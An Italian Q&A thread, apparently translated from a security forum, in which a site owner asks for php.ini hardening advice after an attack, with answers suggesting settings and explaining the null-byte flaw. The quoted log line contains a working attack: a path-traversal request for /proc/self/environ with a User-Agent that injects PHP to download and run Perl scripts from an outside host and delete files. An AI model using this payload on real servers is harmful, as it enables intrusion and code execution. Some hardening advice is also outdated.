impostazioni di sicurezza php.ini dopo l'attacco

Question

impostazioni di sicurezza php.ini dopo l'attacco

#1 da (3 voti)
#2 da (1 voti)

7

Il mio sito Web è stato attaccato e ho bisogno di una buona pratica per un php.ini Ho letto qualche cosa ma non sono ancora sicuro di aver coperto la maggior parte delle opzioni.

ecco le mie impostazioni:

file_uploads = Off
upload_tmp_dir = /var/php_tmp
upload_max_filezize = 0M
allow_url_fopen = Off
allow_url_include = Off
safe_mode = On
display_errors = Off
magic_quotes_gpc = On
magic_quotes_runtime = On
max_file_uploads=0

Ecco quello che ho ottenuto il registro degli errori dalla società di webhost:

121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http://some.thesome.com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget http://some.thesome.com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>"

php hardening

posta Andras Sebestyen 13.09.2011 - 00:21

fonte

2 risposte

1

Questo potrebbe aiutare qualcuno.

expose_php = off
disable_functions = phpinfo
session.auto_start = 0
session.cookie_httponly = 1
session.cookie_secure = 1
session.name = sessId
session.hash_function = sha256
session.hash_bits_per_character = 5

risposta data 05.12.2012 - 09:40

fonte

Leggi altre domande sui tag php hardening

Quanto è sicuro lo schema di login "senza password"? Qualunque vantaggio nel rifiutare una chiamata (cellulare) vs ignorarla?

score 3 · Accepted Answer

Prima di tutto, questo attacco non funzionerà sull'ultimo ramo 5.3 perché sono stati corretti gli attacchi di avvelenamento da byte nulli per le funzioni file-io. Detto questo nessuna delle tue impostazioni difenderà da questi attacchi ad eccezione di magic_qutoes_gpc in alcuni casi limite perché il byte null sarà sfuggito. Anche se per essere onesto disabiliterei magic_qutoes_gpc, non dovresti fare affidamento su di esso per la sicurezza e molto spesso malformerà l'input dell'utente. magic_quotes_gpc è stato rimosso in php6.

Per assicurarti che php sia configurato correttamente, devi eseguire PHPSecInfo . Dovresti anche rimuovere il bit di scrittura dall'intera web root e rimuovere file_privs dal tuo account mysql. Ecco ulteriori informazioni per blocco di php .